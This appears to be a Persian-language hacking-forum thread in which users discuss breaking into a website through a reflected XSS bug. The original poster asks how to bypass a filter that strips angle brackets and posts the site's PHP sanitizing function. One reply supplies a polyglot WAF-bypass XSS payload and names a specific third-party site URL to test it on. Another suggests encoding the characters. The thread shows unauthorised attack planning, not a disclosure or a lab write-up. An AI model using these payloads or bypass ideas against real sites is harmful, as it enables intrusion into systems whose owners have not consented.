discord icon
سرور دیسکورد گاردایران
nnje

نفوذ به سایت با باگ xss

پست های پیشنهاد شده

سلام خدمت دوستان عزیز

دوستان در حال تست روی یک تارگتی هستم که دارای باگ xss هست این تارگت وقتی کدهای جاوا اسکریپت رو  بهش تزریق میکنی تاثیر خودش رو نشون میده ولی وقتی که این کد تو دیتابیس ثبت میشه عمل فیلتر روش صورت میگیره و غیر فعال میشه  پس باگ از نوع   reflected یا بازتابی هست .

 

این غیر فعال شدن به این صورت هست که فقط علامت بزرگتر و کوچیکتر فیلتر میشه و پاک میشه ! یعنی تو هر کدی که علامت <  یا >  وجود داشته باشه حذف میشه !

ایا دوستان برای نفوذ به این تارگت روش یا بایپس خاصی سراغ دارند ؟

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

من منظورتون رو درست نفهمیدم ولی  هر وقت همچین اتفاقی میوفته من یه پیلود برای بایپس waf تزریق میکنم

 

پیلود             /-//\/'/"//(/ */oNcliCk=alert("Mr-.Mat")
               )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

 

تارگت برای تست پیلود بالا

 

https://www.kyvobio.be/membre.php?error=login_rights

 

امتحان کنید . در بعضی جاها جواب میده

 

اگه جایی راجب بایپس اشتباه گفتم به بزرگواری خودتون ببخشید

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در هم اکنون، mat گفته است :

من منظورتون رو درست نفهمیدم ولی  هر وقت همچین اتفاقی میوفته من یه پیلود برای بایپس waf تزریق میکنم

 

           /-//\/'/"//(/ */oNcliCk=alert("Mr-.Mat")
               )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

 

تارگت برای تست پیلود بالا

 

https://www.kyvobio.be/membre.php?error=login_rights

 

امتحان کنید . در بعضی جاها جواب میده

 

اگه جایی راجب بایپس اشتباه گفتم به بزرگواری خودتون ببخشید

 

بسیار ممنونم بابت به اشتراک گذاری تجربتون کدی که ورودی رو فیلتر میکنه بصورت زیر هست 

 static function string($str){
        $str = trim($str);
		$str = str_replace(array('\\', '\'', '"', '<', '>', '[/url]', '[url]', '[img=', ']', '[/URL]', '[URL]', '[IMG=', ']', '[url=', ' '), "", $str);
	    $str = htmlentities($str ,  ENT_QUOTES |ENT_IGNORE, 'UTF-8');
        $str = html_entity_decode($str, ENT_COMPAT | ENT_XHTML, 'utf-8');
		if(preg_match('/\[url\]|\[img\]/i', $str)){
			return false;
		}
        return($str);
    }

این تابع هیچ تلاشی برای رفع باگ xss  نمیکنه صرفا یک فیلتر روی ورودی اعمال میکنه که یه جوری صورت مسئله رو پاک کنه ولی همچنان باگ xss هست فقط باید راهی برای بایپس این تابع پیدا کرد.

ممنون میشم از دوستان اگر تجربشون رو با ما به اشتراک بزارن

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در هم اکنون، nnje گفته است :

 

بسیار ممنونم بابت به اشتراک گذاری تجربتون کدی که ورودی رو فیلتر میکنه بصورت زیر هست 


 static function string($str){
        $str = trim($str);
		$str = str_replace(array('\\', '\'', '"', '<', '>', '[/url]', '[url]', '[img=', ']', '[/URL]', '[URL]', '[IMG=', ']', '[url=', ' '), "", $str);
	    $str = htmlentities($str ,  ENT_QUOTES |ENT_IGNORE, 'UTF-8');
        $str = html_entity_decode($str, ENT_COMPAT | ENT_XHTML, 'utf-8');
		if(preg_match('/\[url\]|\[img\]/i', $str)){
			return false;
		}
        return($str);
    }

این تابع باگ xss  رو رفع نمیکنه صرفا یک فیلتر روی ورودی اعمال میکنه که یه جوری صورت مسئله رو پاک کنه ولی همچنان باگ xss هست فقط باید راهی برای بایپس این تابع پیدا کرد.

ممنون میشم از دوستان اگر تجربشون رو با ما به اشتراک بزارن

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 27 دقیقه قبل، nnje گفته است :

 

نمی دونم ولی اگه <> فیلتر میکنه اینکد کردن رو هم  امتحان کنید

من از این سایت برای اینکد کردن استفاده میکنم

https://meyerweb.com/eric/tools/dencoder/

ولی کد ها رو که برسی کردم دیدم به همین راحتیا بایپس نمیشه ولی ارزش امتحان کردن رو داره

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری